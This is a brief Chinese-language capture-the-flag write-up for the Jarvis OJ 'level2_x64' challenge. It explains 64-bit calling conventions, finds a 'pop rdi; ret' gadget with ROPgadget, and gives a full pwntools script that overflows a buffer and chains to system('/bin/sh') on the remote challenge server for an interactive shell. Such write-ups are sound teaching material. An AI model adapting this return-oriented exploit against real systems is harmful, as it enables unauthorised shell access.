这道题和level2的32位版本的漏洞一样,不过32位程序函数的参数是压在栈中的,而64位程序的前6个参数是存在寄存器中的,第7个开始才压入栈中。
由于我们的目的是将system函数的参数改为/bin/sh,所以我们考虑用pop edi ret 语句将字符串赋值给edi。
同样的,程序中hint存入了/bin/sh,我们直接使用即可。
system函数的地址也很容易获得,剩下的就是pop edi命令的地址。使用如下命令:
ROPgadget --binary level2_x64 --only "pop|ret"|grep rdi
获得其地址,以下为exp
from pwn import *
context(os='linux',arch='i386',log_level='debug')
#p=process('./level2')
p=remote('pwn2.jarvisoj.com',9882)
p.recvline()
bin_adr=0x600A90
sys_adr=0x40063E
popedi_adr=0x4006b3
payload='A'*0x88+p64(popedi_adr)+p64(bin_adr)+p64(sys_adr)
p.send(payload)
p.interactive()